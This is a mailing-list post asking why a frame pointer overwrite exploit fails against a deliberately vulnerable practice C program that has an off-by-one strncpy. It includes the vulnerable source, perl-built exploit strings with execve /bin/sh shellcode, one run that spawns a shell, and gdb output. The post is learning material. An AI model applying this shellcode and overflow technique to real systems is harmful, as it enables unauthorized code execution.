Frame Pointer Overwriting

[mike cramp <mikecc () unixclan net>]

Hey guys, 

I'm having some trouble with frame pointer overwriting, and I was
wondering if anyone could shed any light on this.

First of all, here is the vulnerable program:

mikecc@darkstar frame $ cat vuln_6.c 
/* Is It Vulnerable!? you sure? check again! */
/* 
 * bob.dtors.net
 *   
 *  ---------------------------------------------------
 *  Dtors Security Research (DSR)
 *  Code by: bob
 *  Mail: bob () dtors net
 *  ---------------------------------------------------
 * 
 * Build it and exploit it
 * show us the exploitation log and get extra rights !!  
 *
 *
 * Is It Vulnerable!? you sure? check again!
 * -- this code was taken from bobs person homepage
 * http://it.dtors.net
*/


#include <stdio.h>
#include <string.h>
#define SIZE 256

void bob(char *ptr) {
        char buffer[SIZE];
        strncpy(buffer, ptr, SIZE+1); 
printf("buffer is at %p\n",buffer);
      {
        int a,b;
      for (a=b=0;a<=SIZE;a++,b+=3) {
         if (b!=0 && !(b%26)) printf("\n");
         printf("%02x ", (unsigned char)buffer[a]);
      }
      printf("\n");
   }
}

int main(int argc, char **argv, char **envp) {
   if (argc < 2)
   {
   fprintf(stdout, "bob () dtors net\n");
   exit(1);
   }
   bob(argv[1]);
   return 0;
}
mikecc@darkstar frame $ 

Now, I can exploit this if I store the shellcode in the environment:

mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 .
"\x00"'`
buffer is at 0xbffff4a8
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd 
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf 
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd 
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf 
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd 
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf 
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd 
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd
ff bf 
d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf
d0 fd 
ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00 
sh-2.05b$ 

But, I do not understand how to find the overflow byte, or why this one
works: \x00 

Now since I am researching a remote frame pointer overwrite, I need to
learn how to store the exploit string in the command line:


mikecc@darkstar frame $ ./6 `perl -e 'print
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . 
"\x63\xf9\xff\xbf"x58 . "\x09"'`
buffer is at 0xbffff6a8
6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90
63 f9 
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9
ff bf 
63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf
63 f9 
ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00 
Illegal instruction (core dumped)
mikecc@darkstar frame $ 

When I open up the core dump, I check ebp:

(gdb) i reg ebp
ebp            0xbffff963       0xbffff963
(gdb) 

Now since I cannot copy and paste weird ASCII characters in Evolution, I
do:

x/s $ebp

and it shows my shellcode.  Why is this not executing a shell?

Thanks,

Mike